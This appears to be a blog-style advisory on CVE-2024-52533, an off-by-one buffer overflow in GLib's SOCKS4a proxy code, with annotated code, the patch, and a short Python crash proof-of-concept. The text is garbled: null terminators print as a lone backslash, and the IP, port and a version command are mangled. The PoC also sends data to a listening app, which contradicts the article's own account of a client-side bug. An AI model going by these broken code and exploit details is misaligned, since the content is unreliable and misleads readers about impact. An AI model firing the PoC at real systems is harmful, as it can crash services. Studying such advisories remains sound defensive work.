---
Introduction
A newly discovered vulnerability, CVE-2024-52533, affects the popular GNOME GLib library. Specifically, it involves an off-by-one buffer overflow in the file gio/gsocks4aproxy.c in GLib versions before 2.82.1. This bug makes applications using affected GLib versions potentially vulnerable to denial-of-service or even arbitrary code execution when handling SOCKS4 proxy connections. In this article, we’ll break down what the bug is, show you relevant code, discuss how it can be exploited, and provide links to references for deeper reading.
What Is GNOME GLib?
GLib is a core library providing data structure handling, portability wrappers, and other functions for GNOME and related projects. Many Linux applications use GLib under the hood.
The Vulnerability
Location: gio/gsocks4aproxy.c
Affected GLib Versions: Below 2.82.1
Root Cause: Off-by-one error in buffer allocation for the SOCKS4 connection message.
Impact: Buffer overflow – could lead to application crash (DoS), data corruption, or potentially arbitrary code execution.
Technical Explanation
In the SOCKS4 protocol, a connection request message has a fixed structure, but if the username field is empty, a NULL ('\') terminator is still needed. The GLib code defined the message length with this macro:
#define SOCKS4_CONN_MSG_LEN (8 + 255)
The message is built in a buffer of this size, but the construction process *requires* a trailing null character. If the username is the maximum size, the buffer overflows by one byte. This is a classic off-by-one bug.
Here's an abbreviated version of the problematic code from gsocks4aproxy.c (annotated)
#define SOCKS4_CONN_MSG_LEN (8 + 255)
/* ... */
guchar msg[SOCKS4_CONN_MSG_LEN];
/* ... */
memcpy (msg + 8, username, username_len);
msg[8 + username_len] = '\'; // POTENTIAL OUT-OF-BOUNDS WRITE!
What's the problem?
- If username_len is 255 (the max), then msg[8 + 255] writes to msg[263], but the buffer's highest valid index is 262 (since it’s size is 263). There's no space for the '\'.
The patch increases the message length by 1 to always leave space for the trailing '\'
#define SOCKS4_CONN_MSG_LEN (8 + 255 + 1)
How could this be exploited?
- Denial of Service (Crash): If an attacker supplies a specially crafted username of length 255 (maximum allowed), the application will write past the buffer boundary and likely crash.
- Arbitrary Code Execution: In rare circumstances, especially if heap spraying or memory corruption techniques are used, an attacker could take control of execution flow. This is more likely in applications that process untrusted SOCKS4 proxy credentials.
Here is a basic example (for educational/testing purposes only)
import socket
# Craft a SOCKS4 connect packet with 255-character username:
username = b"A" * 255
packet = b"\x04\x01\x00\x50\x7f\x00\x00\x01" + username + b"\x00"
print(f"Packet length: {len(packet)}") # should be 264
# Connect to a vulnerable GNOME app configured to use a SOCKS4 proxy.
with socket.socket() as s:
s.connect(("127...1", 108)) # Replace with actual app SOCKS4 listener
s.sendall(packet)
# Observe behavior: crash? corruption?
Result: The target app may crash or show instability.
Desktop apps using GLib’s GIO layer for proxy connections (including GNOME apps).
- Servers or background services running on vulnerable GLib (below 2.82.1) and accepting SOCKS4 proxy connections.
Check your GLib version
pkg-config --modversion glib-2.
Update GLib to 2.82.1 or newer.
Download: GNOME GLib Releases
References
- CVE Details: CVE-2024-52533
- GLib Release Notes
- Upstream Fix Commit
- SOCKS4 Protocol Spec
Conclusion
CVE-2024-52533 is a reminder that "off-by-one" errors can show up even in mature, widely-used libraries. If you use GNOME, GNOME-based apps, or any GLib-supported software with SOCKS4 proxies, update immediately. Buffer overflows should never be taken lightly, and even a single byte can make the difference between a secure and a compromised system.
Timeline
Published on: 11/11/2024 23:15:05 UTC
Last modified on: 12/06/2024 14:15:21 UTC